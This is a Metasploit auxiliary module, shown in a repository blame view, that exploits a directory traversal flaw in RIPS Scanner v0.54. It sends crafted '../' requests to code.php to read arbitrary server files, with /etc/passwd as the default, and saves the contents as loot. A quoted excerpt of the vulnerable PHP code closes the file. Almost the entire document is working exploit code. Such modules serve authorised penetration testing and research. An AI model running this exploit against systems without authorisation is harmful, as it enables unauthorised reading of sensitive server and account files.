metasploit-framework/modules/auxiliary/scanner/http/rips_traversal.rb

104 lines
3.1 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'RIPS Scanner Directory Traversal',
'Description' => %q{
2015-04-03 20:27:28 +00:00
This module exploits a directory traversal vulnerability in the RIPS Scanner v0.54,
allowing to read arbitrary files with the web server privileges.
},
'References' =>
[
2015-04-03 20:27:28 +00:00
['EDB', '18660'],
['URL', 'http://codesec.blogspot.com.br/2015/03/rips-scanner-v-054-local-file-include.html']
],
2015-04-03 20:27:28 +00:00
'Author' =>
[
'localh0t', # Vulnerability discovery
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, "The URI path to the web application", "/rips/"]),
OptString.new('FILEPATH', [true, "The path to the file to read", "/etc/passwd"]),
2015-04-03 20:33:27 +00:00
OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 5 ])
], self.class)
end
def run_host(ip)
2015-04-03 20:33:27 +00:00
traversal = "../" * datastore['DEPTH']
filename = datastore['FILEPATH']
filename = filename[1, filename.length] if filename =~ /^\//
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'windows', 'code.php'),
'vars_get' =>
{
'file' => "#{traversal}#{filename}"
}
})
if res &&
res.code == 200 &&
res.headers.include?('Set-Cookie') &&
res.body.length > 304
html = Nokogiri::HTML(res.body)
html_clean = html.search('.codeline').text
print_line("#{html_clean}")
fname = datastore['FILEPATH']
path = store_loot(
'rips.traversal',
'text/plain',
ip,
html_clean,
fname
)
2016-02-01 22:06:34 +00:00
print_good("File saved in: #{path}")
else
2016-02-01 22:06:34 +00:00
print_error("Nothing was downloaded")
end
end
end
=begin
102 $file = $_GET['file'];
103 $marklines = explode(',', $_GET['lines']);
104
105
106 if(!empty($file))
107 {
108 $lines = file($file);
109
110 // place line numbers in extra table for more elegant copy/paste without line numbers
111 echo '<tr><td><table>';
112 for($i=1, $max=count($lines); $i<=$max;$i++)
113 echo "<tr><td class=\"linenrcolumn\"><span class=\"linenr\">$i</span><A id='".($i+2).'\'></A></td></tr>';
114 echo '</table></td><td id="codeonly"><table id="codetable" width="100%">';
115
116 $in_comment = false;
117 for($i=0; $i<$max; $i++)
118 {
119 $in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment);
120 }
121 }
=end